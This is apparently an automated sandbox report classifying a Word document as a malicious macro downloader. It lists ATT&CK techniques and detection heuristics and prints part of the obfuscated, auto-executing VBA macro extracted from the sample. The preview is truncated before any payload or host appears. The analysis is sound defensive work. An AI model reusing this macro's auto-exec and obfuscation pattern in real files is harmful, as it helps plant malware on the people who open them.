Verdict: MALICIOUS (Risk Score: 202)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is a Microsoft Word document containing a VBA macro that is automatically executed upon opening via the Document_Open subroutine. This macro utilizes a GetObject call, indicating an attempt to execute code or load external resources. The presence of a VBA macro and the Document_Open auto-execution strongly suggest a malicious downloader or dropper.
Heuristics (6)

- ClamAV: Doc.Downloader.Generic-7469262-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-7469262-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13063 bytes |

SHA-256: 4bc68be9c2fca5d56d9f715a70f7fab5a0ed833679ed8c1786794d7a14e97821

Preview (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "Fwbejxmnpj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Vkzimturjeenc, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Igsepqmehcbg As Double
Dim Rdtprsexwwvk As Boolean
Ieoffsnrpvso = Jelhfrhtsx
Nlkwjelqvc = (Ahgaoxxcdsnsk)
Nnpmqzueb = 814
Dim Mocxrhqphxkh As String
Achvyrlwyxdg = "Vitae nemo."
Dim Wfcftvljagafc As Double
Dim Hdgkrpxnj As Boolean
Dim Hqpetkrstbu As Boolean
Jjrbbuspqpq = (329)
Dim Wzhystcfnutvm As String
Dim Jbemysahxvm As Double
Zqazkworku = Civpygpe
Dim Pldvevrkc As String
Dim Rfwuukpbw As Boolean
Dim Ulvkeszpx As Double
Sbovorsza = (Wlcyuevz)
Hirsauqzk = ("Voluptas dicta voluptas eveniet velit quia.")
Vlnvfywxjw = (Qpkhgxvtxhz)
Dim Xdnxbaqfubzp As Integer
Fzbtkiuacqm = Otlnmbbh
Hbxnnickfa
Dim Ypfkuntosohqg As Boolean
Dim Uuwuwqrisaix As Boolean
Smhocapyki = Yaxkzbgit
Vtihhnjlqpf = (Abeudvjo)
Rqlhbgrvqsv = 161
Dim Utilawyttzwk As Integer
Lexpcofqqvfif = "Et aut dolorem."
Dim Oifofkbvkjri As String
Dim Qoxcjgrscsxpd As Boolean
Dim Frrzaerrws As Double
Jnglglszhi = (175)
Dim Sbwfmqqhyiera As Double
Dim Uyxakwwhevhr As String
Dfxlugyhme = Flajplxr
Dim Khvawtrk As String
Dim Mwvdgffbvmmsu As Boolean
Dim Khvgwtmmcvp As Integer
Keqczgpjqxck = (Wlormmjlmveig)
Siqokrqwks = ("Annie")
Gujtvqwpandd = (Yruyraozxp)
Dim Vefpezyscrcb As Boolean
Jkifenkztzbm = Ehwuiausklj
End Sub
Attribute VB_Name = "Camxdyzasov"
Attribute VB_Base = "0{68A08007-2EAE-489F-919A-1C699FE87B53}{A0DE910C-662B-4B56-98C9-1ADFD1F10E64}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Zohvecnk"
Function Aqxdtbyhiyvx()
Dim Qgrtpykc As Double
Dim Whtrphlwlmia As String
Hjjrvjsswb = Fnlyuonnuoq
Ahnferqqilfo = (Maelslzcx)
Sunbottvwub = 609
Dim Skqzxbfjag As Integer
Qcydvyjbsl = "Soluta voluptatem sed accusantium dolorum est distinctio labore et maxime."
Dim Ptsmtwmk As Integer
Dim Tiuzewfdrnmp As Double
Dim Urbwrdugnnk As Integer
Tpeuprzjqi = (865)
Dim Nwotjqzvbrbv As Boolean
Dim Rxmvhoanlont As Integer
Yhejfcehfndxk = Bnjewzcwv
Dim Tzkafptcx As Integer
Dim Sqnokrzrkds As Boolean
Dim Aepzywkjix As String
Wfhndilmo = (Qipkxdqebraa)
Tdajeksd = ("Placeat voluptatibus natus.")
Mrdgugvvfly = (Mnfrtinveg)
Dim Ekcjlamzax As Boolean
Jjuwfupb = Ovysyvvthlqw
Usapwstupbld = Fwbejxmnpj.Vkzimturjeenc
Dim Jzerzexnxts As Double
Dim Vwkayxoxqsfp As Double
Sheqirwlow = Rxctseirazn
Uupshycsuegs = (Jyjioskfru)
Bgpjstivowhsh = 135
Dim Vxsvaquzt As Double
Ydlpduvhxvc = "At dolorem asperiores facere."
Dim Njhvmrrbrn As String
Dim Yywjhhwtb As String
Dim Kytmxzajt As Double
Iriymbyph = (207)
Dim Hfvyxqogrjsdw As String
Dim Eucrdvurqfai As Integer
Ummpnroqycjv = Xpnmbtxenqmbn
Dim Twhtlxxgo As Integer
Dim Fnwzhiiyt As Double
Dim Ohaxpzwdleal As Double
Cbayzjzdw = (Injdsotebi)
Ohxkkxbecrue = ("Clay")
Aurslkloh = (Atpghcxchm)
Dim Zogvjhqt As Integer
Lozmjwphaalxk = Yupwczujrs
Cinneipqscq = Usapwstupbld + Camxdyzasov.Ompxvrkfqlvl + Camxdyzasov.Ydootfwvx + Camxdyzasov.Oiuvdbgtedkjs
Dim Myfyslebmximg As Double
Dim Ntoytxjyf As Double
Ajldeoleezyh = Lttkiirwfw
Vozcaajxk = (Jsubcyhplpp)
Qnwgdeep = 659
Dim Tweczxyayqdjs As Boolean
Oxyghrfgv = "Garrett"
Dim Dcugqazvafx As Boolean
Dim Rmprqahvi As String
Dim Ggjcgnpjrlu As String
Racjwnbrb = (172)
Dim Ucopudsvcfz As Boolean
Dim Xpmpnewxqizq As String
Yuyxfquhezzpn = Uaspkmhbmdwtr
Dim Ozvgtbdhuuxq As String
Dim Pyrdxwigbol As String
Dim Muixdcklathz As Integer
Syvmwvnwefp = (Lhyhucirn)
Unacofkeafpig = ("Reiciendis cumque.")
Vfpqchjtzdc = (Wpyfmxsivl)
Dim Vktcvzrgfgdbx As Double
Ktaymsxikhk = Igathqgxq
Tuimwnybwuiad = Cinneipqscq + Camxdyzasov.Vwczvberfmi + Camxdyzasov
```

... (truncated)